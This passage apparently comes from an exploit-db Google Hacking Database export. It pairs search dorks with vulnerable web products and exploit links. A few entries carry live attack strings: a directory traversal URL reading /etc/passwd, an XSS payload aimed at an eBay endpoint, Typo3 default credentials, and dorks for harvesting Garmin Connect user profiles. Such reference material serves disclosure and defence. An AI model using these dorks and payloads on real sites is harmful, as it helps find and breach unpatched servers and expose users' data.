<querystring>https://www.google.com/search?q=Powered+by:+Zanfi+Solutions</querystring>
<edb>https://www.exploit-db.com/exploits/6423</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2202</id>
<link>https://www.exploit-db.com/ghdb/2202</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered By: © Simplicity oF Upload</shortDescription>
<textualDescription>Simplicity oF Upload (1.3.2) Remote File Upload Vulnerability - CVE: 2009-4818: https://www.exploit-db.com/exploits/10568</textualDescription>
<query>Powered By: © Simplicity oF Upload</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=Powered+By:+%C2%A9+Simplicity+oF+Upload</querystring>
<edb>https://www.exploit-db.com/exploits/10568</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2289</id>
<link>https://www.exploit-db.com/ghdb/2289</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by:Traidnt Gallery Version 1.0.</shortDescription>
<textualDescription>Traidnt Gallery add Admin: https://www.exploit-db.com/exploits/10629</textualDescription>
<query>Powered by:Traidnt Gallery Version 1.0.</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=Powered+by:Traidnt+Gallery+Version+1.0.</querystring>
<edb>https://www.exploit-db.com/exploits/10629</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2718</id>
<link>https://www.exploit-db.com/ghdb/2718</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered MarketSaz</shortDescription>
<textualDescription>MarketSaz remote file Upload Vulnerability: https://www.exploit-db.com/exploits/13927</textualDescription>
<query>Powered MarketSaz</query>
<querystring>https://www.google.com/search?q=Powered+MarketSaz</querystring>
<edb>https://www.exploit-db.com/exploits/13927</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>926</id>
<link>https://www.exploit-db.com/ghdb/926</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered.by.instaBoard.version.1.3</shortDescription>
<textualDescription>InstaBoard is a coldfusion forum solution. In its version 1.3 it is vulnerable to SQL Injection.Bugtraq ID 7338</textualDescription>
<query>powered.by.instaBoard.version.1.3</query>
<querystring>https://www.google.com/search?num=100&amp;q=powered.by.instaBoard.version.1.3</querystring>
<edb></edb>
<date>2005-04-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>3429</id>
<link>https://www.exploit-db.com/ghdb/3429</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered.by.RaidenHTTPD +intitle:index.of | inurl:raidenhttpd-admin</shortDescription>
<textualDescription>RaidenHTTPD 1.1.49 (SoftParserFileXml) Remote Code Execution - CVE: 2006-4723: https://www.exploit-db.com/exploits/2328</textualDescription>
<query>Powered.by.RaidenHTTPD +intitle:index.of | inurl:raidenhttpd-admin</query>
<querystring>https://www.google.com/search?q=Powered.by.RaidenHTTPD+%2Bintitle:index.of+|+inurl:raidenhttpd-admin</querystring>
<edb>https://www.exploit-db.com/exploits/2328</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>906</id>
<link>https://www.exploit-db.com/ghdb/906</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered.by:.vBulletin.Version ...3.0.6</shortDescription>
<textualDescription>vBulletin is reported prone to an arbitrary PHP script code execution vulnerability. The issue is reported to exist due to a lack of sufficient input sanitization performed on user-supplied data before this data is included in a dynamically generated scripthttp://www.securityfocus.com/bid/12622/info/</textualDescription>
<query>Powered.by:.vBulletin.Version ...3.0.6</query>
<querystring>https://www.google.com/search?q=Powered.by%3A.vBulletin.Version+...3.0.6</querystring>
<edb></edb>
<date>2005-03-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>3350</id>
<link>https://www.exploit-db.com/ghdb/3350</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered:powered by CMS</shortDescription>
<textualDescription>TinyMCE WYSIWYG Editor Multiple Vulnerabilities: https://www.exploit-db.com/exploits/11358</textualDescription>
<query>powered:powered by CMS</query>
<querystring>https://www.google.com/search?q=powered:powered+by+CMS</querystring>
<edb>https://www.exploit-db.com/exploits/11358</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>489</id>
<link>https://www.exploit-db.com/ghdb/489</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Quicksite demopages for Typo3</shortDescription>
<textualDescription>TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.The quicksite package is a demosite for typo3. Quicksite or Testsite will install a complete website of a soccerclub using the following credentials:user:adminpassword:passwordIf you want to login, again append &quot;typo3&quot; to the website dir.Vendor: http://www.typo3.com/An attacker will consider this as yet another way to find Typo3 hosts for which security focus lists vulnerabilities.</textualDescription>
<query>&quot;FC Bigfeet&quot; -inurl:mail</query>
<querystring>https://www.google.com/search?q=%22FC+Bigfeet%22+-inurl%3Amail</querystring>
<edb></edb>
<date>2004-09-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>2280</id>
<link>https://www.exploit-db.com/ghdb/2280</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Rash Version: 1.2.1</shortDescription>
<textualDescription>RQMS (Rash) 1.2.2 Multiple SQL Injection Vulnerabilities: https://www.exploit-db.com/exploits/8433</textualDescription>
<query>Rash Version: 1.2.1</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=Rash+Version:+1.2.1</querystring>
<edb>https://www.exploit-db.com/exploits/8433</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1595</id>
<link>https://www.exploit-db.com/ghdb/1595</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Realizzato con WSC CMS by Dynamicsoft</shortDescription>
<textualDescription>WSC CMS (Bypass) SQL Injection Vulnerability - CVE: 2010-0698: https://www.exploit-db.com/exploits/11507</textualDescription>
<query>Realizzato con WSC CMS by Dynamicsoft</query>
<querystring>https://www.google.com/search?q=Realizzato+con+WSC+CMS++by+Dynamicsoft</querystring>
<edb>https://www.exploit-db.com/exploits/11507</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3489</id>
<link>https://www.exploit-db.com/ghdb/3489</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Realizzato utilizzando Web Portal</shortDescription>
<textualDescription>WebPortal CMS 0.6-beta Remote Password Change - CVE: 2008-0142: https://www.exploit-db.com/exploits/4835</textualDescription>
<query>Realizzato utilizzando Web Portal</query>
<querystring>https://www.google.com/search?q=Realizzato+utilizzando+Web+Portal</querystring>
<edb>https://www.exploit-db.com/exploits/4835</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>523</id>
<link>https://www.exploit-db.com/ghdb/523</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>ReMOSitory module for Mambo</shortDescription>
<textualDescription>It is reported that the ReMOSitory module for Mambo is prone to an SQL injection vulnerability. This issue is due to a failure of the module to properly validate user supplied URI input. Because of this, a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. It may be possible for an attacker to disclose the administrator password hash by exploiting this issue.Full report: http://www.securityfocus.com/bid/11219Klouw suggests: inurl:index.php?option=com_remository&amp;Itemid= Renegade added : &quot;.. to get an administrator login, change the url to http://www.example.com/administrator .. it will pop up an login box...</textualDescription>
<query>inurl:com_remository</query>
<querystring>https://www.google.com/search?q=inurl%3Acom_remository</querystring>
<edb></edb>
<date>2004-09-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>2880</id>
<link>https://www.exploit-db.com/ghdb/2880</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Sad Raven's Click Counter v1.0</shortDescription>
<textualDescription>Sad Raven's Click Counter 1.0 passwd.dat Disclosure: https://www.exploit-db.com/exploits/7844</textualDescription>
<query>Sad Raven's Click Counter v1.0</query>
<querystring>https://www.google.com/search?q=Sad+Raven%27s+Click+Counter+v1.0</querystring>
<edb>https://www.exploit-db.com/exploits/7844</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2629</id>
<link>https://www.exploit-db.com/ghdb/2629</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Script créé par Funewik - Dezign-Box © France</shortDescription>
<textualDescription>Galerie Dezign-Box France Multi Vulnerability: https://www.exploit-db.com/exploits/11523</textualDescription>
<query>Script créé par Funewik - Dezign-Box © France</query>
<querystring>https://www.google.com/search?q=Script+cr%C3%A9%C3%A9+par+Funewik+-+Dezign-Box+%C2%A9+France</querystring>
<edb>https://www.exploit-db.com/exploits/11523</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6653</id>
<link>https://www.exploit-db.com/ghdb/6653</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Server: Mida eFramework</shortDescription>
<textualDescription># Google Dork: Server: Mida eFramework
# Mida eFramework 2.9.0 - Back Door Access.
CVE : CVE-2020-15921. https://www.exploit-db.com/exploits/48823
Mida eFramework 2.9.0 - Remote Code Execution.
CVE : CVE-2020-15920. https://www.exploit-db.com/exploits/48768
Mida eFramework 2.8.9 - Remote Code Execution
CVE : CVE-2020-15922. https://www.exploit-db.com/exploits/48835
# Date: 29/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>Server: Mida eFramework</query>
<querystring>https://www.google.com/search?q=Server: Mida eFramework</querystring>
<edb></edb>
<date>2020-11-04</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>2387</id>
<link>https://www.exploit-db.com/ghdb/2387</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Site créé avec GuppY v4.5.18 ©</shortDescription>
<textualDescription>GuppY v4.5.18 Blind SQL/XPath injection Vulnerability - CVE: 2010-1740: https://www.exploit-db.com/exploits/12484</textualDescription>
<query>Site créé avec GuppY v4.5.18 ©</query>
<querystring>https://www.google.com/search?q=Site+cr%C3%A9%C3%A9+avec+GuppY+v4.5.18+%C2%A9</querystring>
<edb>https://www.exploit-db.com/exploits/12484</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3431</id>
<link>https://www.exploit-db.com/ghdb/3431</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Site powered By Limbo CMS </shortDescription>
<textualDescription>Limbo CMS 1.0.4.2 Cuid cookie Blind SQL Injection - CVE: 2008-0734: https://www.exploit-db.com/exploits/5088</textualDescription>
<query>Site powered By Limbo CMS</query>
<querystring>https://www.google.com/search?q=Site+powered+By+Limbo+CMS</querystring>
<edb>https://www.exploit-db.com/exploits/5088</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5195</id>
<link>https://www.exploit-db.com/ghdb/5195</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>site:connect.garmin.com inurl:&quot;/modern/activity/&quot;</shortDescription>
<textualDescription>Obtain URLs of the sports activities of users of the social network for
Garmin Connect athletes,
Reference:
https://www.elladodelmal.com/2019/04/hacking-fitness-via-garmin-connect.html
Author: Amador Aparicio, @amadapa
</textualDescription>
<query>site:connect.garmin.com inurl:&quot;/modern/activity/&quot;</query>
<querystring>https://www.google.com/search?q=site:connect.garmin.com inurl:&quot;/modern/activity/&quot;</querystring>
<edb></edb>
<date>2019-04-25</date>
<author>Amador Aparicio</author>
</entry>
<entry>
<id>5194</id>
<link>https://www.exploit-db.com/ghdb/5194</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>site:connect.garmin.com inurl:&quot;/modern/profile/&quot;</shortDescription>
<textualDescription>Obtain profiles of users of the social network for sportsmen Garmin
Connect.
Reference:
http://www.elladodelmal.com/2019/04/hacking-fitness-via-garmin-connect_24.html
Author: Amador Aparicio, @amadapa
</textualDescription>
<query>site:connect.garmin.com inurl:&quot;/modern/profile/&quot;</query>
<querystring>https://www.google.com/search?q=site:connect.garmin.com inurl:&quot;/modern/profile/&quot;</querystring>
<edb></edb>
<date>2019-04-25</date>
<author>Amador Aparicio</author>
</entry>
<entry>
<id>3685</id>
<link>https://www.exploit-db.com/ghdb/3685</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>site:ebay.com inurl:callback</shortDescription>
<textualDescription>Returns:
http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?
then:
http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?xxxx%3Cimg%20src=1%20onerror=alert(1)%3E
Can also use: http://seclists.org/fulldisclosure/2011/Feb/199 XSS through UTF7-BOM string injection to bypass IE8 XSS Filters</textualDescription>
<query>site:ebay.com inurl:callback</query>
<querystring>https://www.google.com/search?q=site:ebay.com+inurl%3Acallback</querystring>
<edb></edb>
<date>2011-02-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>2935</id>
<link>https://www.exploit-db.com/ghdb/2935</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>site:scartserver.com</shortDescription>
<textualDescription>SCart 2.0 (page) Remote Code Execution - CVE: 2006-7012: https://www.exploit-db.com/exploits/1876</textualDescription>
<query>site:scartserver.com</query>
<querystring>https://www.google.com/search?q=site%3Ascartserver.com</querystring>
<edb>https://www.exploit-db.com/exploits/1876</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5177</id>
<link>https://www.exploit-db.com/ghdb/5177</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>site:www.openbugbounty.org + intext:&quot;Open Redirect&quot; + intext:&quot;Unpatched&quot;</shortDescription>
<textualDescription>Dork : site:www.openbugbounty.org + intext:&quot;Open Redirect&quot; + intext:&quot;Unpatched&quot;
Description : this dork gives you all unpatched sensitive websites
vulnerable to open redirect
Author : botsec0
</textualDescription>
<query>site:www.openbugbounty.org + intext:&quot;Open Redirect&quot; + intext:&quot;Unpatched&quot;</query>
<querystring>https://www.google.com/search?q=site:www.openbugbounty.org + intext:&quot;Open Redirect&quot; + intext:&quot;Unpatched&quot;</querystring>
<edb></edb>
<date>2019-04-11</date>
<author>botsec0</author>
</entry>
<entry>
<id>2850</id>
<link>https://www.exploit-db.com/ghdb/2850</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>sitou timou tumou tou</shortDescription>
<textualDescription>Drunken:Golem Gaming Portal (admin_news_bot.php) RFI Vulnerability - CVE: 2009-4622: https://www.exploit-db.com/exploits/9635</textualDescription>
<query>sitou timou tumou tou</query>
<querystring>https://www.google.com/search?q=sitou+timou+tumou+tou</querystring>
<edb>https://www.exploit-db.com/exploits/9635</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3461</id>
<link>https://www.exploit-db.com/ghdb/3461</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Small Business Manager</shortDescription>
<textualDescription>Plesk Small Business Manager 10.2.0 and Site Editor Multiple Vulnerabilities: https://www.exploit-db.com/exploits/15313</textualDescription>
<query>Small Business Manager</query>
<querystring>https://www.google.com/search?q=Small+Business+Manager</querystring>
<edb>https://www.exploit-db.com/exploits/15313</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1469</id>
<link>https://www.exploit-db.com/ghdb/1469</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Snipe Gallery v.3.1.5 by Snipe.Net</shortDescription>
<textualDescription>snipe gallery Script Sql Injection: https://www.exploit-db.com/exploits/14053</textualDescription>
<query>Snipe Gallery v.3.1.5 by Snipe.Net</query>
<querystring>https://www.google.com/search?q=Snipe+Gallery+v.3.1.5+by+Snipe.Net</querystring>
<edb>https://www.exploit-db.com/exploits/14053</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2505</id>
<link>https://www.exploit-db.com/ghdb/2505</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>SPBOARD v4.5</shortDescription>
<textualDescription>Sepal SPBOARD 4.5 (board.cgi) Remote Command Exec Vulnerability - CVE: 2008-4873: https://www.exploit-db.com/exploits/6864</textualDescription>
<query>SPBOARD v4.5</query>
<querystring>https://www.google.com/search?q=SPBOARD+v4.5</querystring>
<edb>https://www.exploit-db.com/exploits/6864</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1609</id>
<link>https://www.exploit-db.com/ghdb/1609</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Supernews 2.6</shortDescription>
<textualDescription>Supernews 2.6 (index.php noticia) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8869</textualDescription>
<query>Supernews 2.6</query>
<querystring>https://www.google.com/search?q=Supernews+2.6</querystring>
<edb>https://www.exploit-db.com/exploits/8869</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2115</id>
<link>https://www.exploit-db.com/ghdb/2115</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>team5 studio all rights reserved site:cn</shortDescription>
<textualDescription>Team 1.x (DD/XSS) Multiple Remote Vulnerabilities - CVE: 2009-0760: https://www.exploit-db.com/exploits/7982</textualDescription>
<query>team5 studio all rights reserved site:cn</query>
<querystring>https://www.google.com/search?q=team5+studio+all+rights+reserved+site:cn</querystring>
<edb>https://www.exploit-db.com/exploits/7982</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2456</id>
<link>https://www.exploit-db.com/ghdb/2456</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>This FAQ is powered by CascadianFAQ</shortDescription>
<textualDescription>CascadianFAQ 4.1 (index.php) Remote SQL Injection Vulnerability - CVE: 2007-0631: https://www.exploit-db.com/exploits/3227</textualDescription>
<query>This FAQ is powered by CascadianFAQ</query>
<querystring>https://www.google.com/search?q=This+FAQ+is+powered+by+CascadianFAQ</querystring>
<edb>https://www.exploit-db.com/exploits/3227</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1445</id>
<link>https://www.exploit-db.com/ghdb/1445</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions, LLC 1999 - 2004.</shortDescription>
<textualDescription>samPHPweb (db.php commonpath) Remote File Inclusion Vulnerability - CVE: 2008-0143: https://www.exploit-db.com/exploits/4834</textualDescription>
<query>This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions, LLC 1999 - 2004.</query>
<querystring>https://www.google.com/search?q=This+page+was+produced+using+SAM+Broadcaster.+%C3%82%C2%A9+Copyright+Spacial+Audio+Solutions,+LLC+1999+-+2004.</querystring>
<edb>https://www.exploit-db.com/exploits/4834</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3166</id>
<link>https://www.exploit-db.com/ghdb/3166</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>This site is powered by e107, which is released under the terms of the GNU GPL License.</shortDescription>
<textualDescription>e107 0.7.21 full Mullti (RFI/XSS) Vulnerabilities: https://www.exploit-db.com/exploits/12818</textualDescription>
<query>This site is powered by e107, which is released under the terms of the GNU GPL License.</query>
<querystring>https://www.google.com/search?q=This+site+is+powered+by+e107,+which+is+released+under+the+terms+of+the+GNU+GPL+License.</querystring>
<edb>https://www.exploit-db.com/exploits/12818</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1883</id>
<link>https://www.exploit-db.com/ghdb/1883</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Thyme 1. © 2006 eXtrovert Software LLC. All rights reserved</shortDescription>
<textualDescription>Thyme 1.3 (export_to) Local File Inclusion Vulnerability - CVE: 2009-0535: https://www.exploit-db.com/exploits/8029</textualDescription>
<query>Thyme 1. © 2006 eXtrovert Software LLC. All rights reserved</query>
<querystring>https://www.google.com/search?q=Thyme+1.+%C3%82%C2%A9+2006+eXtrovert+Software+LLC.+All+rights+reserved</querystring>
<edb>https://www.exploit-db.com/exploits/8029</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1613</id>
<link>https://www.exploit-db.com/ghdb/1613</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>TRUC 0.11.0 :: © 2006 by ASDIS :</shortDescription>
<textualDescription>RUC 0.11.0 (download.php) Remote File Disclosure Vulnerability - CVE: 2008-0814: https://www.exploit-db.com/exploits/5129</textualDescription>
<query>TRUC 0.11.0 :: © 2006 by ASDIS :</query>
<querystring>https://www.google.com/search?q=TRUC+0.11.0+::+%C3%82%C2%A9+2006+by+ASDIS+:</querystring>
<edb>https://www.exploit-db.com/exploits/5129</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2209</id>
<link>https://www.exploit-db.com/ghdb/2209</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Uebimiau Webmail v3.2.0-1.8</shortDescription>
<textualDescription>Uebimiau Web-Mail v3.2.0-1.8 Remote File / Overwrite Vulnerabilities: https://www.exploit-db.com/exploits/8944</textualDescription>
<query>Uebimiau Webmail v3.2.0-1.8</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=Uebimiau+Webmail+v3.2.0-1.8</querystring>
<edb>https://www.exploit-db.com/exploits/8944</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1731</id>
<link>https://www.exploit-db.com/ghdb/1731</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Ultimate-Fun-Book 1.02</shortDescription>
<textualDescription>Ultimate Fun Book 1.02 (function.php) Remote File Include Vulnerability - CVE: 2007-1059: https://www.exploit-db.com/exploits/3336</textualDescription>
<query>Ultimate-Fun-Book 1.02</query>
<querystring>https://www.google.com/search?q=Ultimate-Fun-Book+1.02</querystring>
<edb>https://www.exploit-db.com/exploits/3336</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3241</id>
<link>https://www.exploit-db.com/ghdb/3241</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Uploader des fichiers</shortDescription>
<textualDescription>Service d'upload v1.0.0 Shell Upload Vulnerability: https://www.exploit-db.com/exploits/10938</textualDescription>
<query>Uploader des fichiers</query>
<querystring>https://www.google.com/search?q=Uploader+des+fichiers</querystring>
<edb>https://www.exploit-db.com/exploits/10938</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>826</id>
<link>https://www.exploit-db.com/ghdb/826</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>uploadpics.php?did= -forumintext:Generated.by.phpix.1.0? inurl:$mode=album</shortDescription>
<textualDescription>Product: PHPix Version: 1.0Vuln: Directory traversalPHPix is a Web-based photo album viewer written in PHP. It features automatic generation of thumbnails and different resolution files for viewing on the fly. Synnergy Labs has found a flaw within PHPix that allows a user to successfully traverse the file system on a remote host, allowing arbitrary files/folders to be read. http://www.securiteam.com/unixfocus/6G00K0K04K.html</textualDescription>
<query>intext:Generated.by.phpix.1.0? inurl:$mode=album</query>
<querystring>https://www.google.com/search?q=intext%3AGenerated.by.phpix.1.0%3F+inurl%3A%24mode%3Dalbum</querystring>
<edb></edb>
<date>2005-01-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>1943</id>
<link>https://www.exploit-db.com/ghdb/1943</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>UPublisher</shortDescription>
<textualDescription>UPublisher 1.0 (viewarticle.asp) Remote SQL Injection Vulnerability - CVE: 2006-5888: https://www.exploit-db.com/exploits/2765</textualDescription>
<query>UPublisher</query>
<querystring>https://www.google.com/search?q=UPublisher</querystring>
<edb>https://www.exploit-db.com/exploits/2765</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>306</id>
<link>https://www.exploit-db.com/ghdb/306</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>vBulletin version 3.0.1 newreply.php XSS</shortDescription>
<textualDescription>vBulletin is a customizable forums package for web sites. It has been written in PHP and is complimented with MySQL. While a user is previewing the post, both newreply.php and newthread.php correctly sanitize the input in 'Preview', but not Edit-panel. Malicious code can be injected by an attacker through this flaw. More information at http://www.securityfocus.com/bid/10612/.</textualDescription>
<query>&quot;Powered by: vBulletin * 3.0.1&quot; inurl:newreply.php</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22Powered+by%3A+vBulletin+*+3.0.1%22+inurl%3Anewreply.php</querystring>
<edb></edb>
<date>2004-07-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>3201</id>
<link>https://www.exploit-db.com/ghdb/3201</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>VevoCart Control System</shortDescription>
<textualDescription>Asp VevoCart Control System Version 3.0.4 DB Download Vulnerability: https://www.exploit-db.com/exploits/11134</textualDescription>
<query>VevoCart Control System</query>
<querystring>https://www.google.com/search?q=VevoCart+Control+System</querystring>
<edb>https://www.exploit-db.com/exploits/11134</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2854</id>
<link>https://www.exploit-db.com/ghdb/2854</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Vibro-School CMS by nicLOR.net</shortDescription>
<textualDescription>Vibro-School-CMS (nID) Remote SQL injection Vulnerability - CVE: 2008-6795: https://www.exploit-db.com/exploits/6981</textualDescription>
<query>Vibro-School CMS by nicLOR.net</query>
<querystring>https://www.google.com/search?q=Vibro-School+CMS+by+nicLOR.net</querystring>
<edb>https://www.exploit-db.com/exploits/6981</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>298</id>
<link>https://www.exploit-db.com/ghdb/298</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>VP-ASP Shopping Cart XSS</shortDescription>
<textualDescription>VP-ASP (Virtual Programming - ASP) has won awards both in the US and France. It is now in use in over 70 countries. VP-ASP can be used to build any type of Internet shop and sell anything.According to http://www.securityfocus.com/bid/9164/discussion/ a vulnerability has been reported to exist in VP-ASP software that may allow a remote user to launch cross-site scripting attacks. A remote attacker may exploit this issue to potentially execute HTML or script code in the security context of the vulnerable site.The vendor has released fixes to address this issue. It is reported that the fixes are applied to VP-ASP 5.0 as of February 2004. An attacker could also search Google for intitle:&quot;VP-ASP Shopping Cart *&quot; -&quot;5.0&quot; to find unpatched servers.</textualDescription>
<query>filetype:asp inurl:&quot;shopdisplayproducts.asp&quot;</query>
<querystring>https://www.google.com/search?q=filetype%3Aasp+inurl%3A%22shopdisplayproducts.asp%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-06-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>2208</id>
<link>https://www.exploit-db.com/ghdb/2208</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>VS-Gästebuch V. ©</shortDescription>
<textualDescription>S-Gastebuch 1.5.3 (gb_pfad) Remote File Include - CVE: 2007-1011: https://www.exploit-db.com/exploits/3328</textualDescription>
<query>VS-Gästebuch V. ©</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=VS-G%C3%A4stebuch+V.+%C2%A9</querystring>
<edb>https://www.exploit-db.com/exploits/3328</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3477</id>
<link>https://www.exploit-db.com/ghdb/3477</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>WEBalbum 2004-2006 duda</shortDescription>
<textualDescription>WebAlbum 2.02pl COOKIE[skin2] Remote Code Execution - CVE: 2006-1480: https://www.exploit-db.com/exploits/1608</textualDescription>
<query>WEBalbum 2004-2006 duda</query>
<querystring>https://www.google.com/search?q=WEBalbum+2004-2006+duda</querystring>
<edb>https://www.exploit-db.com/exploits/1608</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1313</id>
<link>https://www.exploit-db.com/ghdb/1313</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>WEBalbum 2004-2006 duda -ihackstuff -exploit</shortDescription>
<textualDescription>dork: WEBalbum 2004-2006 duda -ihackstuff -exploitsoftware site: http://www.web-album.org/ advisory/ poc exploit: http://retrogod.altervista.org/webalbum_202pl_local_xpl.html</textualDescription>
<query>WEBalbum 2004-2006 duda -ihackstuff -exploit</query>
<querystring>https://www.google.com/search?q=WEBalbum+2004-2006+duda+-ihackstuff+-exploit&amp;num=100&amp;start=200&amp;sa=N&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>463</id>
<link>https://www.exploit-db.com/ghdb/463</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>WebAPP directory traversal</shortDescription>
<textualDescription>WebAPP is advertised as the internet's most feature rich, easy to run PERL based portal system. The WebAPP system has a serious reverse directory traversal vulnerabilityhttp:///cgi-bin/index.cgi?action=topics&amp;viewcat=../../../../../../../etc/passwd%00http:///cgi-bin/index.cgi?action=topics&amp;viewcat=../../db/members/admin.dat%00Detailed info : http://www.packetstormsecurity.com/0408-exploits/webapp.traversal.txtCredits goes to PhTeam for discovering this vulnerability.</textualDescription>
<query>inurl:/cgi-bin/index.cgi inurl:topics inurl:viewca</query>
<querystring>https://www.google.com/search?num=100&amp;q=inurl%3A%2Fcgi-bin%2Findex.cgi+inurl%3Atopics+inurl%3Aviewcat%3D+%2Bintext%3A%22WebAPP%22+-site%3Aweb-app.org</querystring>
<edb></edb>
<date>2004-09-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>2973</id>
<link>https://www.exploit-db.com/ghdb/2973</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Webdevelopment Tinx-IT</shortDescription>
<textualDescription>WebVision 2.1 (news.php n) Remote SQL Injection: https://www.exploit-db.com/exploits/9193</textualDescription>
<query>Webdevelopment Tinx-IT</query>
<querystring>https://www.google.com/search?q=Webdevelopment+Tinx-IT</querystring>
<edb>https://www.exploit-db.com/exploits/9193</edb>
